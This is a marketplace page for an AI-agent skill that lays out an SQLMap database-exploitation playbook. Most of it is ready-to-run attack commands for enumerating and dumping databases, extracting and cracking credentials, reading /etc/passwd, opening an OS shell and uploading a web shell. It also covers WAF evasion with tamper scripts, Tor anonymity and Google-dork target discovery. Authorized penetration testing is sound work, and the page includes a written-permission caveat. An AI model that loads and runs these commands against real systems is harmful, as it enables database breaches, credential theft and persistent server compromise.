How do I install SQLMap Database Penetration Testing?

Install SQLMap Database Penetration Testing with a single command: npx mdskills install sickn33/sqlmap-database-pentesting. This downloads the skill files into your project and your AI agent picks them up automatically.

What platforms support SQLMap Database Penetration Testing?

SQLMap Database Penetration Testing works with Claude Code, Claude Desktop, Cursor, Vscode Copilot, Windsurf, Continue Dev, Codex, Gemini Cli, Amp, Roo Code, Goose, Opencode, Trae, Qodo, Command Code. Skills use the open SKILL.md format which is compatible with any AI coding agent that reads markdown instructions.

← Back to skills

SQLMap Database Penetration Testing

Name: SQLMap Database Penetration Testing: AI Agent Skill
Rating: 9 (1 reviews)
Author: sickn33

Verified

Database DesignIntermediate

This skill should be used when the user asks to "automate SQL injection testing," "enumerate database structure," "extract database credentials using sqlmap," "dump tables and columns from a vulnerable database," or "perform automated database penetration testing." It provides comprehensive guidance for using SQLMap to detect and exploit SQL injection vulnerabilities.

by @sickn330Updated 2 weeks ago

Add this skill

npx mdskills install sickn33/sqlmap-database-pentesting

Fork & Edit

Skill Advisor9.0

Comprehensive SQLMap guide with clear workflows, extensive examples, and thorough troubleshooting

+Provides systematic progression from detection to extraction with clear commands
+Includes extensive troubleshooting section covering WAF bypass and performance tuning
+Covers multiple attack vectors and target specification methods with practical examples
-Lacks explicit safety checks to prevent execution on unauthorized targets
-Could emphasize verification of authorization before each major operation

SKILL.md

Edit in Browser

1---
2name: SQLMap Database Penetration Testing
3description: This skill should be used when the user asks to "automate SQL injection testing," "enumerate database structure," "extract database credentials using sqlmap," "dump tables and columns from a vulnerable database," or "perform automated database penetration testing." It provides comprehensive guidance for using SQLMap to detect and exploit SQL injection vulnerabilities.
4metadata:
5  author: zebbern
6  version: "1.1"
7---
8 
9# SQLMap Database Penetration Testing
10 
11## Purpose
12 
13Provide systematic methodologies for automated SQL injection detection and exploitation using SQLMap. This skill covers database enumeration, table and column discovery, data extraction, multiple target specification methods, and advanced exploitation techniques for MySQL, PostgreSQL, MSSQL, Oracle, and other database management systems.
14 
15## Inputs / Prerequisites
16 
17- **Target URL**: Web application URL with injectable parameter (e.g., `?id=1`)
18- **SQLMap Installation**: Pre-installed on Kali Linux or downloaded from GitHub
19- **Verified Injection Point**: URL parameter confirmed or suspected to be SQL injectable
20- **Request File (Optional)**: Burp Suite captured HTTP request for POST-based injection
21- **Authorization**: Written permission for penetration testing activities
22 
23## Outputs / Deliverables
24 
25- **Database Enumeration**: List of all databases on the target server
26- **Table Structure**: Complete table names within target database
27- **Column Mapping**: Column names and data types for each table
28- **Extracted Data**: Dumped records including usernames, passwords, and sensitive data
29- **Hash Values**: Password hashes for offline cracking
30- **Vulnerability Report**: Confirmation of SQL injection type and severity
31 
32## Core Workflow
33 
34### 1. Identify SQL Injection Vulnerability
35 
36#### Manual Verification
37```bash
38# Add single quote to break query
39http://target.com/page.php?id=1'
40 
41# If error message appears, likely SQL injectable
42# Error example: "You have an error in your SQL syntax"
43```
44 
45#### Initial SQLMap Scan
46```bash
47# Basic vulnerability detection
48sqlmap -u "http://target.com/page.php?id=1" --batch
49 
50# With verbosity for detailed output
51sqlmap -u "http://target.com/page.php?id=1" --batch -v 3
52```
53 
54### 2. Enumerate Databases
55 
56#### List All Databases
57```bash
58sqlmap -u "http://target.com/page.php?id=1" --dbs --batch
59```
60 
61**Key Options:**
62- `-u`: Target URL with injectable parameter
63- `--dbs`: Enumerate database names
64- `--batch`: Use default answers (non-interactive mode)
65 
66### 3. Enumerate Tables
67 
68#### List Tables in Specific Database
69```bash
70sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables --batch
71```
72 
73**Key Options:**
74- `-D`: Specify target database name
75- `--tables`: Enumerate table names
76 
77### 4. Enumerate Columns
78 
79#### List Columns in Specific Table
80```bash
81sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --columns --batch
82```
83 
84**Key Options:**
85- `-T`: Specify target table name
86- `--columns`: Enumerate column names
87 
88### 5. Extract Data
89 
90#### Dump Specific Table Data
91```bash
92sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump --batch
93```
94 
95#### Dump Specific Columns
96```bash
97sqlmap -u "http://target.com/page.php?id=1" -D database_name -T users -C username,password --dump --batch
98```
99 
100#### Dump Entire Database
101```bash
102sqlmap -u "http://target.com/page.php?id=1" -D database_name --dump-all --batch
103```
104 
105**Key Options:**
106- `--dump`: Extract all data from specified table
107- `--dump-all`: Extract all data from all tables
108- `-C`: Specify column names to extract
109 
110### 6. Advanced Target Options
111 
112#### Target from HTTP Request File
113```bash
114# Save Burp Suite request to file, then:
115sqlmap -r /path/to/request.txt --dbs --batch
116```
117 
118#### Target from Log File
119```bash
120# Feed log file with multiple requests
121sqlmap -l /path/to/logfile --dbs --batch
122```
123 
124#### Target Multiple URLs (Bulk File)
125```bash
126# Create file with URLs, one per line:
127# http://target1.com/page.php?id=1
128# http://target2.com/page.php?id=2
129sqlmap -m /path/to/bulkfile.txt --dbs --batch
130```
131 
132#### Target via Google Dorks (Use with Caution)
133```bash
134# Automatically find and test vulnerable sites (LEGAL TARGETS ONLY)
135sqlmap -g "inurl:?id= site:yourdomain.com" --batch
136```
137 
138## Quick Reference Commands
139 
140### Database Enumeration Progression
141 
142| Stage | Command |
143|-------|---------|
144| List Databases | `sqlmap -u "URL" --dbs --batch` |
145| List Tables | `sqlmap -u "URL" -D dbname --tables --batch` |
146| List Columns | `sqlmap -u "URL" -D dbname -T tablename --columns --batch` |
147| Dump Data | `sqlmap -u "URL" -D dbname -T tablename --dump --batch` |
148| Dump All | `sqlmap -u "URL" -D dbname --dump-all --batch` |
149 
150### Supported Database Management Systems
151 
152| DBMS | Support Level |
153|------|---------------|
154| MySQL | Full Support |
155| PostgreSQL | Full Support |
156| Microsoft SQL Server | Full Support |
157| Oracle | Full Support |
158| Microsoft Access | Full Support |
159| IBM DB2 | Full Support |
160| SQLite | Full Support |
161| Firebird | Full Support |
162| Sybase | Full Support |
163| SAP MaxDB | Full Support |
164| HSQLDB | Full Support |
165| Informix | Full Support |
166 
167### SQL Injection Techniques
168 
169| Technique | Description | Flag |
170|-----------|-------------|------|
171| Boolean-based blind | Infers data from true/false responses | `--technique=B` |
172| Time-based blind | Uses time delays to infer data | `--technique=T` |
173| Error-based | Extracts data from error messages | `--technique=E` |
174| UNION query-based | Uses UNION to append results | `--technique=U` |
175| Stacked queries | Executes multiple statements | `--technique=S` |
176| Out-of-band | Uses DNS or HTTP for exfiltration | `--technique=Q` |
177 
178### Essential Options
179 
180| Option | Description |
181|--------|-------------|
182| `-u` | Target URL |
183| `-r` | Load HTTP request from file |
184| `-l` | Parse targets from Burp/WebScarab log |
185| `-m` | Bulk file with multiple targets |
186| `-g` | Google dork (use responsibly) |
187| `--dbs` | Enumerate databases |
188| `--tables` | Enumerate tables |
189| `--columns` | Enumerate columns |
190| `--dump` | Dump table data |
191| `--dump-all` | Dump all database data |
192| `-D` | Specify database |
193| `-T` | Specify table |
194| `-C` | Specify columns |
195| `--batch` | Non-interactive mode |
196| `--random-agent` | Use random User-Agent |
197| `--level` | Level of tests (1-5) |
198| `--risk` | Risk of tests (1-3) |
199 
200## Constraints and Limitations
201 
202### Operational Boundaries
203- Requires valid injectable parameter in target URL
204- Network connectivity to target database server required
205- Large database dumps may take significant time
206- Some WAF/IPS systems may block SQLMap traffic
207- Time-based attacks significantly slower than error-based
208 
209### Performance Considerations
210- Use `--threads` to speed up enumeration (default: 1)
211- Limit dumps with `--start` and `--stop` for large tables
212- Use `--technique` to specify faster injection method if known
213 
214### Legal Requirements
215- Only test systems with explicit written authorization
216- Google dork attacks against unknown sites are illegal
217- Document all testing activities and findings
218- Respect scope limitations defined in engagement rules
219 
220### Detection Risk
221- SQLMap generates significant log entries
222- Use `--random-agent` to vary User-Agent header
223- Consider `--delay` to avoid triggering rate limits
224- Proxy through Tor with `--tor` for anonymity (authorized tests only)
225 
226## Examples
227 
228### Example 1: Complete Database Enumeration
229```bash
230# Step 1: Discover databases
231sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs --batch
232# Result: acuart database found
233 
234# Step 2: List tables
235sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables --batch
236# Result: users, products, carts, etc.
237 
238# Step 3: List columns
239sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns --batch
240# Result: username, password, email columns
241 
242# Step 4: Dump user credentials
243sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --dump --batch
244```
245 
246### Example 2: POST Request Injection
247```bash
248# Save Burp request to file (login.txt):
249# POST /login.php HTTP/1.1
250# Host: target.com
251# Content-Type: application/x-www-form-urlencoded
252# 
253# username=admin&password=test
254 
255# Run SQLMap with request file
256sqlmap -r /root/Desktop/login.txt -p username --dbs --batch
257```
258 
259### Example 3: Bulk Target Scanning
260```bash
261# Create bulkfile.txt:
262echo "http://192.168.1.10/sqli/Less-1/?id=1" > bulkfile.txt
263echo "http://192.168.1.10/sqli/Less-2/?id=1" >> bulkfile.txt
264 
265# Scan all targets
266sqlmap -m bulkfile.txt --dbs --batch
267```
268 
269### Example 4: Aggressive Testing
270```bash
271# High level and risk for thorough testing
272sqlmap -u "http://target.com/page.php?id=1" --dbs --batch --level=5 --risk=3
273 
274# Specify all techniques
275sqlmap -u "http://target.com/page.php?id=1" --dbs --batch --technique=BEUSTQ
276```
277 
278### Example 5: Extract Specific Credentials
279```bash
280# Target specific columns
281sqlmap -u "http://target.com/page.php?id=1" \
282  -D webapp \
283  -T admin_users \
284  -C admin_name,admin_pass,admin_email \
285  --dump --batch
286 
287# Automatically crack password hashes
288sqlmap -u "http://target.com/page.php?id=1" \
289  -D webapp \
290  -T users \
291  --dump --batch \
292  --passwords
293```
294 
295### Example 6: OS Shell Access (Advanced)
296```bash
297# Get interactive OS shell (requires DBA privileges)
298sqlmap -u "http://target.com/page.php?id=1" --os-shell --batch
299 
300# Execute specific OS command
301sqlmap -u "http://target.com/page.php?id=1" --os-cmd="whoami" --batch
302 
303# File read from server
304sqlmap -u "http://target.com/page.php?id=1" --file-read="/etc/passwd" --batch
305 
306# File upload to server
307sqlmap -u "http://target.com/page.php?id=1" --file-write="/local/shell.php" --file-dest="/var/www/html/shell.php" --batch
308```
309 
310## Troubleshooting
311 
312### Issue: "Parameter does not seem injectable"
313**Cause**: SQLMap cannot find injection point
314**Solution**:
315```bash
316# Increase testing level and risk
317sqlmap -u "URL" --dbs --batch --level=5 --risk=3
318 
319# Specify parameter explicitly
320sqlmap -u "URL" -p "id" --dbs --batch
321 
322# Try different injection techniques
323sqlmap -u "URL" --dbs --batch --technique=BT
324 
325# Add prefix/suffix for filter bypass
326sqlmap -u "URL" --dbs --batch --prefix="'" --suffix="-- -"
327```
328 
329### Issue: Target Behind WAF/Firewall
330**Cause**: Web Application Firewall blocking requests
331**Solution**:
332```bash
333# Use tamper scripts
334sqlmap -u "URL" --dbs --batch --tamper=space2comment
335 
336# List available tamper scripts
337sqlmap --list-tampers
338 
339# Common tamper combinations
340sqlmap -u "URL" --dbs --batch --tamper=space2comment,between,randomcase
341 
342# Add delay between requests
343sqlmap -u "URL" --dbs --batch --delay=2
344 
345# Use random User-Agent
346sqlmap -u "URL" --dbs --batch --random-agent
347```
348 
349### Issue: Connection Timeout
350**Cause**: Network issues or slow target
351**Solution**:
352```bash
353# Increase timeout
354sqlmap -u "URL" --dbs --batch --timeout=60
355 
356# Reduce threads
357sqlmap -u "URL" --dbs --batch --threads=1
358 
359# Add retries
360sqlmap -u "URL" --dbs --batch --retries=5
361```
362 
363### Issue: Time-Based Attacks Too Slow
364**Cause**: Default time delay too conservative
365**Solution**:
366```bash
367# Reduce time delay (risky, may cause false negatives)
368sqlmap -u "URL" --dbs --batch --time-sec=3
369 
370# Use boolean-based instead if possible
371sqlmap -u "URL" --dbs --batch --technique=B
372```
373 
374### Issue: Cannot Dump Large Tables
375**Cause**: Table has too many records
376**Solution**:
377```bash
378# Limit number of records
379sqlmap -u "URL" -D db -T table --dump --batch --start=1 --stop=100
380 
381# Dump specific columns only
382sqlmap -u "URL" -D db -T table -C username,password --dump --batch
383 
384# Exclude specific columns
385sqlmap -u "URL" -D db -T table --dump --batch --exclude-sysdbs
386```
387 
388### Issue: Session Drops During Long Scan
389**Cause**: Session timeout or connection reset
390**Solution**:
391```bash
392# Save and resume session
393sqlmap -u "URL" --dbs --batch --output-dir=/root/sqlmap_session
394 
395# Resume from saved session
396sqlmap -u "URL" --dbs --batch --resume
397 
398# Use persistent HTTP connection
399sqlmap -u "URL" --dbs --batch --keep-alive
400```
401

Full transparency — inspect the skill content before installing.